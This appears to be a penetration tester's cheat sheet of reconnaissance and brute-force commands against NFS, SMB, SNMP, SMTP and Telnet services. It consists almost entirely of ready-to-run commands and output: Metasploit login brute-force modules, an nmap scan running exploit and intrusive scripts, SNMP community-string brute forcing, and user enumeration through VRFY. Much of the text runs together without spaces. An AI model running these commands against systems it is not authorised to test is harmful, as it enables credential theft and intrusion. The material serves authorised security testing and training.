Mount NTFS share mount -t nfs 192.168.1.72:/home/vulnix /tmp/mnt -nolock
If you see any NFS related ACL port open, see /etc/exports
2049/tcp nfs_acl
/etc/exports: the access control list for filesystems which may be exported to NFS clients. See exports(5).
msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_version) > run
[*] 192.168.31.142:139 - Host could not be identified: Unix (Samba 2.2.1a)
SMB BruteForce
msf auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_login
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_version) > run
nmap -v -d1 -sV --script-args=unsafe=1 --script-args=unsafe --script"(auth or brute or discovery or exploit or external or fuzzer or intrusive or malware or safe or version or vuln) and not(smb-brute or http-slowloris or http-brute or http-enum or http-form-fuzzer or broadcast-avahi-dos or smb-flood or dns-fuzz or http-form-brute or http-iis-short-name-brute or http-fileupload-exploiter or vnc-brute or http-fileupload-exploiter or dos)" -oA nse_full_try2 25.0.0.151
targetip="192.168.1.1"#snmp-checksnmp-check"$targetip"|tee"$targetip"/snmpchk.txt#Enumerating the entire MIB Treesnmpwalk -c public -v1"$targetip"|tee"$targetip"/snmpwalk.txt#Enumerate Windows Userssnmpwalk -c public -v1"$targetip" 1.3.6.1.4.1.77.1.2.25|tee"$targetip"/snmpwalk_users.txt#Enumerate Open TCP Portssnmpwalk -c public -v1"$targetip" 1.3.6.1.2.1.6.13.1.3|tee"$targetip"/snmpwalk_tcp_ports.txt#Enumerate installed Softwaresnmpwalk -c public -v1"$targetip" 1.3.6.1.2.1.25.6.3.1.2|tee"$targetip"/snmpwalk_software.txt#Enumerate Running Windows Processessnmpwalk -c public -v1"$targetip" 1.3.6.1.2.1.25.4.2.1.2|tee"$targetip"/snmpwalk_processes.txt
Using Nmap:
nmap -sU -p 161 --script=*snmp* 192.168.1.200
Using Metasploit:
msf> use auxiliary/scanner/snmp/snmp_loginmsf> use auxiliary/scanner/snmp/snmp_enum
snmp-check 192.168.1.2 -c publicsnmpget -v 1 -c public IPsnmpwalk -v 1 -c public IPsnmpbulkwalk -v2c -c public -Cn0 -Cr10 IPonesixtyone -c /usr/share/wordlists/dirb/small.txt 192.168.1.200 // find communities with bruteforcefor i in$(cat /usr/share/wordlists/metasploit/unix_users.txt);dosnmpwalk -v 1 -c$i 192.168.1.200;done|grep -e"Timeout" // find communities with bruteforce
smtp-user-enum //in Kalismtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 10.11.1.22SMTP sendmail commands:bash-2.05a$ telnet localhost 25Trying 127.0.0.1...Connected to localhost.Escape character is '^]'.220 barry ESMTP Sendmail 8.11.6/8.11.6;Sun, 20 Aug 2017 00:01:02 +0300help214-2.0.0 This is sendmail version 8.11.6214-2.0.0 Topics:214-2.0.0 HELO EHLO MAIL RCPT DATA214-2.0.0 RSET NOOP QUIT HELP VRFY214-2.0.0 EXPN VERB ETRN DSN AUTH214-2.0.0 STARTTLS214-2.0.0 For more info use "HELP <topic>".214-2.0.0 To report bugs in the implementation send email to214-2.0.0[email protected].214-2.0.0 For local information send email to Postmaster at your site.214 2.0.0 End of HELP infoAUTH503 5.3.3 AUTH mechanism not availableEHLO barry250-barry Hello localhost [127.0.0.1], pleased to meet you250-ENHANCEDSTATUSCODES250-EXPN250-VERB250-8BITMIME250-SIZE250-DSN250-ONEX250-ETRN250-XUSR250 HELPAUTH LOGIN
use auxiliary/scanner/telnet/telnet_loginmsf auxiliary(telnet_login)> set BLANK_PASSWORDS falseBLANK_PASSWORDS => falsemsf auxiliary(telnet_login)> set PASS_FILE passwords.txtPASS_FILE => passwords.txtmsf auxiliary(telnet_login)> set RHOSTS 192.168.1.0/24RHOSTS =>192.168.1.0/24msf auxiliary(telnet_login)> set THREADS 254THREADS =>254msf auxiliary(telnet_login)> set USER_FILE users.txtUSER_FILE => users.txtmsf auxiliary(telnet_login)> set VERBOSE falseVERBOSE => falsemsf auxiliary(telnet_login)> runmsf auxiliary(telnet_login)> sessions -l // to see the sessions that succeded
Get Telnet Version:
use auxiliary/scanner/telnet/telnet_versionmsf auxiliary(telnet_version)> set RHOSTS 192.168.1.0/24RHOSTS =>192.168.1.0/24msf auxiliary(telnet_version)> set THREADS 254THREADS =>254msf auxiliary(telnet_version)> run